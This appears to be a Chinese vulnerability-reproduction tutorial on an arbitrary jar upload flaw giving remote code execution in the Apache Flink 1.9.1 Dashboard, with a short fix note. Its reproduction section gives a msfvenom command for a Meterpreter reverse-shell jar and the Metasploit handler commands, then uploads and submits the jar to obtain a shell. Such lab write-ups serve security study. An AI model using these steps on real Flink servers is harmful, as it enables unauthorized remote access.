温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Apache Flink任意Jar包上传致RCE漏洞的示例分析

发布时间:2021-12-28 15:27:02 来源:亿速云 阅读:242 作者:小新 栏目:安全技术

这篇文章给大家分享的是有关Apache Flink任意Jar包上传致RCE漏洞的示例分析的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。

0x01漏洞概述

攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的

0x02影响范围

到目前Apache Flink 1.9.1版本

0x03环境搭建

攻击机:kali

受害机:ubuntu16

1. 安装java8环境,自行百度教程

Apache Flink任意Jar包上传致RCE漏洞的示例分析

2. 下载Flink1.9.1版本,然后解压安装包

Flink下载地址:https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

解压 tar -zxvf

Apache Flink任意Jar包上传致RCE漏洞的示例分析

3. 进入bin目录运行./start-cluster.sh启动环境

Apache Flink任意Jar包上传致RCE漏洞的示例分析

4.在浏览器打开,出现以下界面表示安装成功

Apache Flink任意Jar包上传致RCE漏洞的示例分析

0x04漏洞复现

1. 首先使用kali生成jar的后门包

msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=port -f jar > shell.jar

Apache Flink任意Jar包上传致RCE漏洞的示例分析

2.使用msfconsole监听shell设置的端口

use exploit/multi/handler

set payload java/shell/reverse_tcp

Apache Flink任意Jar包上传致RCE漏洞的示例分析

Apache Flink任意Jar包上传致RCE漏洞的示例分析

3.run开启监听

Apache Flink任意Jar包上传致RCE漏洞的示例分析

4.把制作好的shell.jar包访问目标站点并上传shell.jar

Apache Flink任意Jar包上传致RCE漏洞的示例分析

5.点击Submit触发漏洞,反弹回了shell

Apache Flink任意Jar包上传致RCE漏洞的示例分析

0x05修复建议

更新官方补丁或更新最新版本

感谢各位的阅读!关于“Apache Flink任意Jar包上传致RCE漏洞的示例分析”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI